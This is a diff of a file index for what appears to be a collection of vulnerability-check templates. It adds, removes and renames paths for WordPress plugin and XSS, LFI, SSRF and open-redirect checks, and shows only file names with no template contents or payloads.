./poc/wordpress/wp-asset-clean-up-2bdf53d1a4bcb567e4c12458624a2d4a.yaml @@ -98499,7 +98532,7 @@ ./poc/wordpress/wp-church-admin-xss-11419.yaml ./poc/wordpress/wp-church-admin-xss-11420.yaml ./poc/wordpress/wp-church-admin-xss-11421.yaml -./poc/wordpress/wp-church-admin-xss-11423.yaml +./poc/wordpress/wp-church-admin-xss-11422.yaml ./poc/wordpress/wp-church-admin-xss-11424.yaml ./poc/wordpress/wp-church-admin-xss.yaml ./poc/wordpress/wp-cirrus-411a378f22a1a6af169e368f8522997a.yaml @@ -98546,6 +98579,7 @@ ./poc/wordpress/wp-code-highlightjs-plugin.yaml ./poc/wordpress/wp-code-highlightjs.yaml ./poc/wordpress/wp-code-snippets-xss-11425.yaml +./poc/wordpress/wp-code-snippets-xss-11426.yaml ./poc/wordpress/wp-codemirror-block-00c8945b2d90aba47cb8e8cc192bdf4e.yaml ./poc/wordpress/wp-codemirror-block.yaml ./poc/wordpress/wp-coder-132985a8b76990e0c6cd6695eb596f6c.yaml @@ -98584,7 +98618,7 @@ ./poc/wordpress/wp-conference-schedule.yaml ./poc/wordpress/wp-config-file-editor-84106243219572b793cbbcfa1ea1a8b6.yaml ./poc/wordpress/wp-config-file-editor.yaml -./poc/wordpress/wp-config-setup-11427.yaml +./poc/wordpress/wp-config-setup-11428.yaml ./poc/wordpress/wp-config-setup-11429.yaml ./poc/wordpress/wp-config-setup-11430.yaml ./poc/wordpress/wp-config-setup.yaml @@ -98744,9 +98778,9 @@ ./poc/wordpress/wp-custom-pages.yaml ./poc/wordpress/wp-custom-post-template-efd63a67ee15374063f7c4b69a61e144.yaml ./poc/wordpress/wp-custom-post-template.yaml -./poc/wordpress/wp-custom-tables-xss-11431.yaml ./poc/wordpress/wp-custom-tables-xss-11432.yaml ./poc/wordpress/wp-custom-tables-xss-11433.yaml +./poc/wordpress/wp-custom-tables-xss-11434.yaml ./poc/wordpress/wp-custom-tables-xss-11435.yaml ./poc/wordpress/wp-custom-tables-xss.yaml ./poc/wordpress/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml @@ -99089,7 +99123,6 @@ ./poc/wordpress/wp-email-subscribers-listing-11440.yaml ./poc/wordpress/wp-email-subscribers-listing-11441.yaml ./poc/wordpress/wp-email-subscribers-listing-11443.yaml -./poc/wordpress/wp-email-subscribers-listing.yaml ./poc/wordpress/wp-email-template-1729a8753eae476fa81f29fbf915eae7.yaml ./poc/wordpress/wp-email-template-77ad67534972b8073fe68dc3e6a0ae34.yaml ./poc/wordpress/wp-email-template-9ceea61553b1440c884786aa4c073642.yaml @@ -99444,8 +99477,8 @@ ./poc/wordpress/wp-front-end-repository.yaml ./poc/wordpress/wp-full-auto-tags-manager-4c934eda242d0419e3e635b91ae55277.yaml ./poc/wordpress/wp-full-auto-tags-manager.yaml -./poc/wordpress/wp-full-path-disclosure-11455.yaml ./poc/wordpress/wp-full-path-disclosure-11456.yaml +./poc/wordpress/wp-full-path-disclosure-11457.yaml ./poc/wordpress/wp-full-path-disclosure.yaml ./poc/wordpress/wp-full-stripe-free-080a5561255af98399eb27da1263ccaf.yaml ./poc/wordpress/wp-full-stripe-free-880466ddc7fd0af03d20a07473dd287e.yaml @@ -99596,8 +99629,10 @@ ./poc/wordpress/wp-grimag-open-redirect-11459.yaml ./poc/wordpress/wp-grimag-open-redirect-11460.yaml ./poc/wordpress/wp-grimag-open-redirect-11461.yaml +./poc/wordpress/wp-grimag-open-redirect-11462.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11463.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11464.yaml +./poc/wordpress/wp-gtranslate-open-redirect-11465.yaml ./poc/wordpress/wp-gtranslate-open-redirect-11466.yaml ./poc/wordpress/wp-guestmap-138b91374da611e5609255da3727b885.yaml ./poc/wordpress/wp-guestmap.yaml @@ -99693,10 +99728,10 @@ ./poc/wordpress/wp-ical-availability.yaml ./poc/wordpress/wp-icommerce-e4efce603d8cea787a9ab5952a7e3a37.yaml ./poc/wordpress/wp-icommerce.yaml -./poc/wordpress/wp-idx-broker-platinum-listing-11469.yaml ./poc/wordpress/wp-idx-broker-platinum-listing-11470.yaml ./poc/wordpress/wp-idx-broker-platinum-listing-11471.yaml ./poc/wordpress/wp-idx-broker-platinum-listing-11472.yaml +./poc/wordpress/wp-idx-broker-platinum-listing.yaml ./poc/wordpress/wp-image-carousel-ee79bd840d0f54b417cb444a7b15624f.yaml ./poc/wordpress/wp-image-carousel.yaml ./poc/wordpress/wp-image-news-slider-1f300c32b8c59cff91d25785e458af50.yaml @@ -99751,9 +99786,10 @@ ./poc/wordpress/wp-insert.yaml ./poc/wordpress/wp-instagram-bank-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/wordpress/wp-instagram-bank.yaml +./poc/wordpress/wp-install-11473.yaml ./poc/wordpress/wp-install-11474.yaml -./poc/wordpress/wp-install-11475.yaml ./poc/wordpress/wp-install-php.yaml +./poc/wordpress/wp-install.yaml ./poc/wordpress/wp-instance-rename-f54408534e740536e4255c5420540815.yaml ./poc/wordpress/wp-instance-rename.yaml ./poc/wordpress/wp-insurance-d6bda609865d6ab618b4f735cbea39bb.yaml @@ -99782,7 +99818,8 @@ ./poc/wordpress/wp-invoice.yaml ./poc/wordpress/wp-iwp-client-listing-11476.yaml ./poc/wordpress/wp-iwp-client-listing-11477.yaml -./poc/wordpress/wp-iwp-client-listing-11479.yaml +./poc/wordpress/wp-iwp-client-listing-11478.yaml +./poc/wordpress/wp-iwp-client-listing.yaml ./poc/wordpress/wp-javospot-lfi-11480.yaml ./poc/wordpress/wp-javospot-lfi-11481.yaml ./poc/wordpress/wp-javospot-lfi-11482.yaml @@ -99925,8 +99962,8 @@ ./poc/wordpress/wp-levoslideshow-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-levoslideshow-plugin.yaml ./poc/wordpress/wp-levoslideshow.yaml +./poc/wordpress/wp-license-file-11489.yaml ./poc/wordpress/wp-license-file-11490.yaml -./poc/wordpress/wp-license-file-11491.yaml ./poc/wordpress/wp-license-file.yaml ./poc/wordpress/wp-license.yaml ./poc/wordpress/wp-lightbox-2-77e6013abc8939366eda9dc7f95c8a05.yaml @@ -100188,9 +100225,9 @@ ./poc/wordpress/wp-memory-plugin.yaml ./poc/wordpress/wp-memory.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-1.yaml +./poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11497.yaml -./poc/wordpress/wp-memphis-documents-library-lfi-11498.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-11499.yaml ./poc/wordpress/wp-memphis-documents-library-lfi-2.yaml ./poc/wordpress/wp-menu-cart-9ecf9f388452040136695fbe6305b098.yaml @@ -100300,7 +100337,6 @@ ./poc/wordpress/wp-mpdf-95b1d86b0d9172f70e27dd5cdd6025a1.yaml ./poc/wordpress/wp-mpdf.yaml ./poc/wordpress/wp-mstore-plugin-listing-11501.yaml -./poc/wordpress/wp-mstore-plugin-listing.yaml ./poc/wordpress/wp-mui-mass-user-input-a8af40a859ef12017793ca809201c2d2.yaml ./poc/wordpress/wp-mui-mass-user-input-b32a81e6becbfc443d59541b147d668c.yaml ./poc/wordpress/wp-mui-mass-user-input-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -100315,6 +100351,7 @@ ./poc/wordpress/wp-multiple-theme-ssrf-11510.yaml ./poc/wordpress/wp-multiple-theme-ssrf-11511.yaml ./poc/wordpress/wp-multiple-theme-ssrf-11512.yaml +./poc/wordpress/wp-multiple-theme-ssrf-11513.yaml ./poc/wordpress/wp-multisite-content-copier-02469035e949992a5abfd04fc61ddbad.yaml ./poc/wordpress/wp-multisite-content-copier-9f591f88f9aee0030295b5c3d28f9149.yaml ./poc/wordpress/wp-multisite-content-copier-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -100410,7 +100447,7 @@ ./poc/wordpress/wp-oxygen-theme-lfi-11520.yaml ./poc/wordpress/wp-oxygen-theme-lfi-11521.yaml ./poc/wordpress/wp-oxygen-theme-lfi-11522.yaml -./poc/wordpress/wp-oxygen-theme-lfi-11523.yaml +./poc/wordpress/wp-oxygen-theme-lfi.yaml ./poc/wordpress/wp-page-duplicator-be65ad55f4da905c8cc51fe26685a61e.yaml ./poc/wordpress/wp-page-duplicator.yaml ./poc/wordpress/wp-page-numbers-deeffc536ac92ea53731ce0c6d98a5c8.yaml @@ -100498,6 +100535,7 @@ ./poc/wordpress/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml ./poc/wordpress/wp-php-widget.yaml ./poc/wordpress/wp-phpfreechat-xss-11524.yaml +./poc/wordpress/wp-phpfreechat-xss-11525.yaml ./poc/wordpress/wp-phpfreechat-xss-11526.yaml ./poc/wordpress/wp-phpfreechat-xss-11527.yaml ./poc/wordpress/wp-phpfreechat-xss-11528.yaml @@ -100542,7 +100580,6 @@ ./poc/wordpress/wp-plugin-1-flashgallery-listing-1.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml -./poc/wordpress/wp-plugin-1-flashgallery-listing-11532.yaml ./poc/wordpress/wp-plugin-1-flashgallery-listing-2.yaml ./poc/wordpress/wp-plugin-ad-widget-lfi.yaml ./poc/wordpress/wp-plugin-canto-ssrf.yaml @@ -100556,19 +100593,18 @@ ./poc/wordpress/wp-plugin-lifterlms-11533.yaml ./poc/wordpress/wp-plugin-lifterlms-11534.yaml ./poc/wordpress/wp-plugin-lifterlms-11535.yaml -./poc/wordpress/wp-plugin-lifterlms-11536.yaml ./poc/wordpress/wp-plugin-lifterlms.yaml ./poc/wordpress/wp-plugin-lister-8b40d9719849c24be01ba764d3e4a1ff.yaml ./poc/wordpress/wp-plugin-lister.yaml ./poc/wordpress/wp-plugin-manager-921df181249bd59c9625c2dcc1df1b66.yaml ./poc/wordpress/wp-plugin-manager.yaml -./poc/wordpress/wp-plugin-marmoset-viewer-xss-11538.yaml +./poc/wordpress/wp-plugin-marmoset-viewer-xss-11537.yaml ./poc/wordpress/wp-plugin-marmoset-viewer-xss.yaml ./poc/wordpress/wp-plugin-memphis-documents-library-lfi.yaml ./poc/wordpress/wp-plugin-statistics-sqli.yaml ./poc/wordpress/wp-plugin-utlimate-member-11539.yaml ./poc/wordpress/wp-plugin-utlimate-member-11540.yaml -./poc/wordpress/wp-plugin-utlimate-member-11542.yaml +./poc/wordpress/wp-plugin-utlimate-member-11541.yaml ./poc/wordpress/wp-plugin-wp-with-spritz-lfi.yaml ./poc/wordpress/wp-plugins.yaml ./poc/wordpress/wp-pocket-urls-254217ba23bf67e5ab1f8ee2edeef109.yaml @@ -100595,9 +100631,9 @@ ./poc/wordpress/wp-popup-builder-0c09eb9779aee8d5af8e26f717d75189.yaml ./poc/wordpress/wp-popup-builder-a5f68b9d82c37b214641a19757438e98.yaml ./poc/wordpress/wp-popup-builder.yaml -./poc/wordpress/wp-popup-listing-11543.yaml ./poc/wordpress/wp-popup-listing-11544.yaml ./poc/wordpress/wp-popup-listing-11545.yaml +./poc/wordpress/wp-popup-listing.yaml ./poc/wordpress/wp-popups-lite-397d56c4826cb39d4978e607d024b3f6.yaml ./poc/wordpress/wp-popups-lite-482e13507074a152afd1c369afb2758f.yaml ./poc/wordpress/wp-popups-lite-69ef67ee7aec095c81a6e3175b553ce1.yaml @@ -100754,8 +100790,7 @@ ./poc/wordpress/wp-prostore-open-redirect-11549.yaml ./poc/wordpress/wp-publications-b85a3c11767227494a836174e6262f5c.yaml ./poc/wordpress/wp-publications.yaml -./poc/wordpress/wp-qards-listing-11551.yaml -./poc/wordpress/wp-qards-listing.yaml +./poc/wordpress/wp-qards-listing-11552.yaml ./poc/wordpress/wp-qrcode-me-v-card-314ed947e5aebc74cf601ba290f4edad.yaml ./poc/wordpress/wp-qrcode-me-v-card.yaml ./poc/wordpress/wp-quick-front-end-editor-02de13f83ec39d9f9fa219b2764f4023.yaml @@ -100918,7 +100953,7 @@ ./poc/wordpress/wp-reviews-plugin-for-google-ef8cb6fc353aaae2bbe90dfc74187793.yaml ./poc/wordpress/wp-reviews-plugin-for-google.yaml ./poc/wordpress/wp-revslider-file-download-11553.yaml -./poc/wordpress/wp-revslider-file-download-11554.yaml +./poc/wordpress/wp-revslider-file-download-11555.yaml ./poc/wordpress/wp-revslider-file-download.yaml ./poc/wordpress/wp-roadmap-7e3122605112af28a9af70aa035a1854.yaml ./poc/wordpress/wp-roadmap.yaml @@ -100998,7 +101033,6 @@ ./poc/wordpress/wp-securimage-xss-11556.yaml ./poc/wordpress/wp-securimage-xss-11558.yaml ./poc/wordpress/wp-securimage-xss-11559.yaml -./poc/wordpress/wp-securimage-xss-11560.yaml ./poc/wordpress/wp-securimage-xss.yaml ./poc/wordpress/wp-security-audit-log-00ed417b21dd63bdfa86736dcf1b985f.yaml ./poc/wordpress/wp-security-audit-log-069819bcca9f4c9d5cccbe176453ccc4.yaml @@ -101079,6 +101113,7 @@ ./poc/wordpress/wp-setup-config.yaml ./poc/wordpress/wp-setup-wizard-8c031e05af523e07598a9fec815c857a.yaml ./poc/wordpress/wp-setup-wizard.yaml +./poc/wordpress/wp-sfwd-lms-listing-11562.yaml ./poc/wordpress/wp-sfwd-lms-listing-11563.yaml ./poc/wordpress/wp-sfwd-lms-listing-11564.yaml ./poc/wordpress/wp-sfwd-lms-listing-11565.yaml @@ -101132,7 +101167,7 @@ ./poc/wordpress/wp-simple-fields-lfi-11568.yaml ./poc/wordpress/wp-simple-fields-lfi-11569.yaml ./poc/wordpress/wp-simple-fields-lfi-11570.yaml -./poc/wordpress/wp-simple-fields-lfi.yaml +./poc/wordpress/wp-simple-fields-lfi-11571.yaml ./poc/wordpress/wp-simple-firewall-3ae2ab7cde1e76100e523aaf928ed76a.yaml ./poc/wordpress/wp-simple-firewall-4f7bee968b7be1bbc933652a546908b5.yaml ./poc/wordpress/wp-simple-firewall-5843a59deee1d98f848220c24385547a.yaml @@ -101179,7 +101214,7 @@ ./poc/wordpress/wp-slideshow-xss-11572.yaml ./poc/wordpress/wp-slideshow-xss-11573.yaml ./poc/wordpress/wp-slideshow-xss-11574.yaml -./poc/wordpress/wp-slideshow-xss-11575.yaml +./poc/wordpress/wp-slideshow-xss-11576.yaml ./poc/wordpress/wp-slideshow-xss.yaml ./poc/wordpress/wp-slimstat-11cc5bcae93c068aebc65d8de7e515c1.yaml ./poc/wordpress/wp-slimstat-1fc9f020991eebfa5f69f5e6000f4ad1.yaml @@ -101289,7 +101324,6 @@ ./poc/wordpress/wp-social-widget-d7b289a4844fbc5f1814a16ab030f4b4.yaml ./poc/wordpress/wp-social-widget.yaml ./poc/wordpress/wp-social.yaml -./poc/wordpress/wp-socialfit-xss-11577.yaml ./poc/wordpress/wp-socialfit-xss-11579.yaml ./poc/wordpress/wp-socialfit-xss-11580.yaml ./poc/wordpress/wp-socialfit-xss-11581.yaml @@ -101717,9 +101751,10 @@ ./poc/wordpress/wp-ttisbdir.yaml ./poc/wordpress/wp-tutor-lfi-11596.yaml ./poc/wordpress/wp-tutor-lfi-11597.yaml +./poc/wordpress/wp-tutor-lfi-11598.yaml ./poc/wordpress/wp-tutor-lfi-11599.yaml -./poc/wordpress/wp-tutor-lfi-11600.yaml ./poc/wordpress/wp-tutor-lfi-11601.yaml +./poc/wordpress/wp-tutor-lfi.yaml ./poc/wordpress/wp-twilio-core-57a9edaed661bdb0228f355d7457cb63.yaml ./poc/wordpress/wp-twilio-core-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/wp-twilio-core.yaml @@ -101801,9 +101836,9 @@ ./poc/wordpress/wp-unique-article-header-image.yaml ./poc/wordpress/wp-upg-113eefecb479d7972d2f0664091b88f1.yaml ./poc/wordpress/wp-upg.yaml +./poc/wordpress/wp-upload-data-11602.yaml ./poc/wordpress/wp-upload-data-11603.yaml ./poc/wordpress/wp-upload-data-11604.yaml -./poc/wordpress/wp-upload-data-11605.yaml ./poc/wordpress/wp-upload-restriction-34ada383253b9728876613379fa9dea6.yaml ./poc/wordpress/wp-upload-restriction-3b5c347348b988baaab2601e987517ae.yaml ./poc/wordpress/wp-upload-restriction-81b96fa379daa9e93cab1ad57b78f1f7.yaml @@ -101922,6 +101957,7 @@ ./poc/wordpress/wp-vault-lfi-11608.yaml ./poc/wordpress/wp-vault-lfi-11609.yaml ./poc/wordpress/wp-vault-lfi-11610.yaml +./poc/wordpress/wp-vault-lfi-11611.yaml ./poc/wordpress/wp-vault-lfi-11612.yaml ./poc/wordpress/wp-vault-local-file-inclusion.yaml ./poc/wordpress/wp-vault-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -102010,8 +102046,8 @@ ./poc/wordpress/wp-woocommerce-email-verification-11618.yaml ./poc/wordpress/wp-woocommerce-email-verification-11619.yaml ./poc/wordpress/wp-woocommerce-email-verification-2.yaml -./poc/wordpress/wp-woocommerce-file-download-11620.yaml ./poc/wordpress/wp-woocommerce-file-download-11621.yaml +./poc/wordpress/wp-woocommerce-file-download.yaml ./poc/wordpress/wp-woocommerce-pdf-invoice-listing-11622.yaml ./poc/wordpress/wp-woocommerce-quickbooks-24e0b26c242968cb290b2a8bf1d68029.yaml ./poc/wordpress/wp-woocommerce-quickbooks-95df688c610b5a94c1c10c8d8b9ac0d6.yaml @@ -102575,6 +102611,7 @@ ./poc/wordpress/wpmu-f535dd9c67cc53c57251591f727ba1d3.yaml ./poc/wordpress/wpmu.yaml ./poc/wordpress/wpmudev-my-calender-xss-11502.yaml +./poc/wordpress/wpmudev-my-calender-xss-11503.yaml ./poc/wordpress/wpmudev-my-calender-xss.yaml ./poc/wordpress/wpmudev-pub-keys-11504.yaml ./poc/wordpress/wpmudev-pub-keys-11505.yaml @@ -102779,6 +102816,7 @@ ./poc/wordpress/wptouch-open-redirect-11592.yaml ./poc/wordpress/wptouch-open-redirect-11593.yaml ./poc/wordpress/wptouch-open-redirect-11594.yaml +./poc/wordpress/wptouch-open-redirect-11595.yaml ./poc/wordpress/wptouch-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wptouch-plugin-open-redirect.yaml ./poc/wordpress/wptouch-plugin.yaml @@ -102941,8 +102979,6 @@ ./poc/xss/XSS_CRLF_Injection.yaml ./poc/xss/XSS_test.yaml ./poc/xss/academy-lms-xss.yaml -./poc/xss/accessibility-helper-xss-18.yaml -./poc/xss/accessibility-helper-xss-19.yaml ./poc/xss/accessibility-helper-xss.yaml ./poc/xss/acme-xss-28.yaml ./poc/xss/acme-xss-29.yaml @@ -102953,7 +102989,6 @@ ./poc/xss/aem-xss-childlist-selector-197.yaml ./poc/xss/aem-xss-childlist-selector-198.yaml ./poc/xss/aikcms_v2-xss.yaml -./poc/xss/akamai-arl-xss-246.yaml ./poc/xss/akamai-arl-xss-247.yaml ./poc/xss/akamai-arl-xss-248.yaml ./poc/xss/akamai-arl-xss-249.yaml @@ -102985,18 +103020,16 @@ ./poc/xss/ckan-dom-based-xss-990.yaml ./poc/xss/ckan-dom-based-xss-991.yaml ./poc/xss/ckan-dom-based-xss-992.yaml -./poc/xss/ckan-dom-based-xss-993.yaml ./poc/xss/clicshopping-v2-xss.yaml ./poc/xss/coldfusion-debug-xss-1.yaml ./poc/xss/coldfusion-debug-xss-1152.yaml +./poc/xss/coldfusion-debug-xss-1153.yaml ./poc/xss/coldfusion-debug-xss-1154.yaml ./poc/xss/coldfusion-debug-xss-2.yaml -./poc/xss/coldfusion-debug-xss.yaml ./poc/xss/concrete-xss-1174.yaml ./poc/xss/concrete-xss-1175.yaml ./poc/xss/concrete-xss-1176.yaml ./poc/xss/concrete-xss-1177.yaml -./poc/xss/concrete-xss-1178.yaml ./poc/xss/concretexss.yaml ./poc/xss/ctp-xss.yaml ./poc/xss/custom-aem-xss.yaml @@ -103009,6 +103042,7 @@ ./poc/xss/discourse-xss.yaml ./poc/xss/dlink-netgear-xss.yaml ./poc/xss/dom-xss-7080.yaml +./poc/xss/dom-xss-siteminder.yaml ./poc/xss/dom-xss-web-message.yaml ./poc/xss/dom-xss.yaml ./poc/xss/dom-xss.yml @@ -103016,18 +103050,14 @@ ./poc/xss/eclipse-help-system-xss-7164.yaml ./poc/xss/eclipse-xss.yaml ./poc/xss/elex-woocommerce-xss-7199.yaml -./poc/xss/elex-woocommerce-xss-7200.yaml -./poc/xss/elex-woocommerce-xss.yaml +./poc/xss/empirecms-xss-7218.yaml ./poc/xss/empirecms-xss-7219.yaml -./poc/xss/empirecms-xss-7220.yaml -./poc/xss/empirecms-xss.yaml ./poc/xss/eris-xss.yaml ./poc/xss/exchange-cve-2021-41349-xss.yml ./poc/xss/express-xss.yaml -./poc/xss/feedwordpress-xss-7459.yaml ./poc/xss/feedwordpress-xss-7460.yaml ./poc/xss/feedwordpress-xss.yaml -./poc/xss/flow-flow-social-stream-xss-7524.yaml +./poc/xss/flow-flow-social-stream-xss.yaml ./poc/xss/fuzzing-xss-get-params-html-attribute-injection.yaml ./poc/xss/fuzzing-xss-get-params-html-injection.yaml ./poc/xss/fuzzing-xss-get-params-javascript-context-injection.yaml @@ -103037,7 +103067,6 @@ ./poc/xss/geovision-geowebserver-xss-7599.yaml ./poc/xss/geovision-geowebserver-xss-7600.yaml ./poc/xss/geovision-geowebserver-xss-7601.yaml -./poc/xss/geovision-geowebserver-xss.yaml ./poc/xss/global-domains-xss-7717.yaml ./poc/xss/global-domains-xss-7718.yaml ./poc/xss/globalprotect-xss.yaml @@ -103047,8 +103076,8 @@ ./poc/xss/header_blind_xss-7915.yaml ./poc/xss/header_blind_xss.yaml ./poc/xss/hidden xss.yaml -./poc/xss/httpbin-xss-8052.yaml ./poc/xss/httpbin-xss-8053.yaml +./poc/xss/httpbin-xss.yaml ./poc/xss/httpbin-xss.yml ./poc/xss/id-q-xss.yaml ./poc/xss/id-xss.yaml @@ -103063,7 +103092,6 @@ ./poc/xss/kaue-xss-vmware-vcloud-director.yaml ./poc/xss/keycloak-xss-8478.yaml ./poc/xss/keycloak-xss-8479.yaml -./poc/xss/keycloak-xss-8480.yaml ./poc/xss/keycloak-xss-8481.yaml ./poc/xss/keycloak-xss-8482.yaml ./poc/xss/keycloak-xss.yaml @@ -103075,11 +103103,9 @@ ./poc/xss/microweber-stored-xss.yaml ./poc/xss/microweber-xss-8864.yaml ./poc/xss/microweber-xss-8865.yaml -./poc/xss/microweber-xss.yaml ./poc/xss/mida-eframework-xss-8866.yaml ./poc/xss/mida-eframework-xss-8867.yaml -./poc/xss/mida-eframework-xss-8869.yaml -./poc/xss/mida-eframework-xss.yaml +./poc/xss/mida-eframework-xss-8868.yaml ./poc/xss/moodle-auth-xss.yaml ./poc/xss/moodle-filter-jmol-xss-8942.yaml ./poc/xss/moodle-filter-jmol-xss-8943.yaml @@ -103092,7 +103118,7 @@ ./poc/xss/moodle-xss-8949.yaml ./poc/xss/moodle-xss-8950.yaml ./poc/xss/moodle-xss-8951.yaml -./poc/xss/moodle-xss-8952.yaml +./poc/xss/ms-exchange-server-reflected-xss-8962.yaml ./poc/xss/ms-exchange-server-reflected-xss-8963.yaml ./poc/xss/ms-exchange-server-reflected-xss-8964.yaml ./poc/xss/ms-exchange-server-reflected-xss-8965.yaml @@ -103105,6 +103131,7 @@ ./poc/xss/nginx-module-vts-xss-9106.yaml ./poc/xss/nginx-module-vts-xss-9107.yaml ./poc/xss/nginx-module-vts-xss-9108.yaml +./poc/xss/nginx-module-vts-xss-9109.yaml ./poc/xss/nginx-module-vts-xss-9110.yaml ./poc/xss/nginx-module-vts-xss.yaml ./poc/xss/nginx-vhost-xss.yaml @@ -103117,33 +103144,32 @@ ./poc/xss/oracle-ebs-xss-9375.yaml ./poc/xss/oracle-ebs-xss-9377.yaml ./poc/xss/oracle-ebs-xss.yaml -./poc/xss/oracle-oam-xss.yaml ./poc/xss/oracle-siebel-xss-9400.yaml ./poc/xss/oracle-siebel-xss-9401.yaml ./poc/xss/oracle-siebel-xss-9402.yaml ./poc/xss/oracle-siebel-xss-9403.yaml +./poc/xss/oracle-siebel-xss.yaml ./poc/xss/param-xss.yaml ./poc/xss/parentlink-xss-1.yaml ./poc/xss/parentlink-xss-2.yaml -./poc/xss/parentlink-xss-9466.yaml ./poc/xss/parentlink-xss-9467.yaml +./poc/xss/parentlink-xss.yaml +./poc/xss/php-timeclock-xss-9550.yaml ./poc/xss/php-timeclock-xss-9551.yaml ./poc/xss/php-timeclock-xss-9552.yaml -./poc/xss/php-timeclock-xss-9553.yaml ./poc/xss/php-timeclock-xss-9554.yaml +./poc/xss/php-timeclock-xss.yaml ./poc/xss/phpldapadmin-xss.yaml ./poc/xss/ping-pong-xss.yaml ./poc/xss/qcubed-xss-1.yaml ./poc/xss/qcubed-xss-2.yaml -./poc/xss/qcubed-xss-9749.yaml +./poc/xss/qcubed-xss.yaml ./poc/xss/rails6-xss-9797.yaml -./poc/xss/rails6-xss-9798.yaml ./poc/xss/rails6-xss-9799.yaml ./poc/xss/rails6-xss-9800.yaml ./poc/xss/reflected-xss-apollo.yaml ./poc/xss/reflected-xss.yaml ./poc/xss/rockmongo-xss-9901.yaml -./poc/xss/rockmongo-xss-9902.yaml ./poc/xss/rockmongo-xss-9903.yaml ./poc/xss/rockmongo-xss-9904.yaml ./poc/xss/rxss.yaml @@ -103158,29 +103184,29 @@ ./poc/xss/sick-beard-xss-10231.yaml ./poc/xss/sick-beard-xss-10232.yaml ./poc/xss/sick-beard-xss-10233.yaml +./poc/xss/sick-beard-xss-10234.yaml ./poc/xss/sick-beard-xss.yaml ./poc/xss/simple-xss.yaml ./poc/xss/sniplets-xss-10344.yaml ./poc/xss/sniplets-xss-10345.yaml ./poc/xss/sniplets-xss.yaml -./poc/xss/squirrelmail-add-xss.yaml +./poc/xss/squirrelmail-add-xss-10515.yaml ./poc/xss/squirrelmail-vkeyboard-xss-10522.yaml ./poc/xss/swagger-xss.yaml ./poc/xss/t-soft-e-commerce4-urunadi-stored-xss.yaml ./poc/xss/thruk-xss-10758.yaml -./poc/xss/thruk-xss-10759.yaml ./poc/xss/thruk-xss.yaml ./poc/xss/tikiwiki-reflected-xss-1.yaml ./poc/xss/tikiwiki-reflected-xss-10777.yaml ./poc/xss/tikiwiki-reflected-xss-10778.yaml ./poc/xss/tikiwiki-reflected-xss-10779.yaml +./poc/xss/tikiwiki-reflected-xss-10780.yaml ./poc/xss/tikiwiki-reflected-xss-2.yaml ./poc/xss/tikiwiki-reflected-xss.yaml ./poc/xss/top-15-xss.yaml ./poc/xss/top-xss-params-10806.yaml ./poc/xss/top-xss-params-10807.yaml ./poc/xss/top-xss-params-10808.yaml -./poc/xss/top-xss-params-10809.yaml ./poc/xss/top-xss-params.yaml ./poc/xss/turbocrm-xss-10848.yaml ./poc/xss/turbocrm-xss-10849.yaml @@ -103195,9 +103221,8 @@ ./poc/xss/weblogic-servlet-xss.yml ./poc/xss/wems-enterprise-xss.yaml ./poc/xss/wems-manager-xss-11191.yaml -./poc/xss/wems-manager-xss-11192.yaml ./poc/xss/wems-manager-xss-11193.yaml -./poc/xss/wems-manager-xss.yaml +./poc/xss/wems-manager-xss-11194.yaml ./poc/xss/window-name-domxss-11212.yaml ./poc/xss/window-name-domxss-11213.yaml ./poc/xss/window-name-domxss-11214.yaml @@ -103219,20 +103244,21 @@ ./poc/xss/wordpress-zebra-form-xss-11378.yaml ./poc/xss/wordpress-zebra-form-xss.yaml ./poc/xss/wp-adaptive-xss-11403.yaml -./poc/xss/wp-ambience-xss-11407.yaml +./poc/xss/wp-ambience-xss-11408.yaml ./poc/xss/wp-ambience-xss-11409.yaml ./poc/xss/wp-ambience-xss-11410.yaml ./poc/xss/wp-ambience-xss.yaml ./poc/xss/wp-church-admin-xss-11419.yaml ./poc/xss/wp-church-admin-xss-11420.yaml ./poc/xss/wp-church-admin-xss-11421.yaml -./poc/xss/wp-church-admin-xss-11423.yaml +./poc/xss/wp-church-admin-xss-11422.yaml ./poc/xss/wp-church-admin-xss-11424.yaml ./poc/xss/wp-church-admin-xss.yaml ./poc/xss/wp-code-snippets-xss-11425.yaml -./poc/xss/wp-custom-tables-xss-11431.yaml +./poc/xss/wp-code-snippets-xss-11426.yaml ./poc/xss/wp-custom-tables-xss-11432.yaml ./poc/xss/wp-custom-tables-xss-11433.yaml +./poc/xss/wp-custom-tables-xss-11434.yaml ./poc/xss/wp-custom-tables-xss-11435.yaml ./poc/xss/wp-custom-tables-xss.yaml ./poc/xss/wp-finder-xss-11447.yaml @@ -103258,24 +103284,23 @@ ./poc/xss/wp-nextgen-xss-11518.yaml ./poc/xss/wp-nextgen-xss.yaml ./poc/xss/wp-phpfreechat-xss-11524.yaml +./poc/xss/wp-phpfreechat-xss-11525.yaml ./poc/xss/wp-phpfreechat-xss-11526.yaml ./poc/xss/wp-phpfreechat-xss-11527.yaml ./poc/xss/wp-phpfreechat-xss-11528.yaml ./poc/xss/wp-phpfreechat-xss.yaml -./poc/xss/wp-plugin-marmoset-viewer-xss-11538.yaml +./poc/xss/wp-plugin-marmoset-viewer-xss-11537.yaml ./poc/xss/wp-plugin-marmoset-viewer-xss.yaml ./poc/xss/wp-qwiz-online-xss.yaml ./poc/xss/wp-securimage-xss-11556.yaml ./poc/xss/wp-securimage-xss-11558.yaml ./poc/xss/wp-securimage-xss-11559.yaml -./poc/xss/wp-securimage-xss-11560.yaml ./poc/xss/wp-securimage-xss.yaml ./poc/xss/wp-slideshow-xss-11572.yaml ./poc/xss/wp-slideshow-xss-11573.yaml 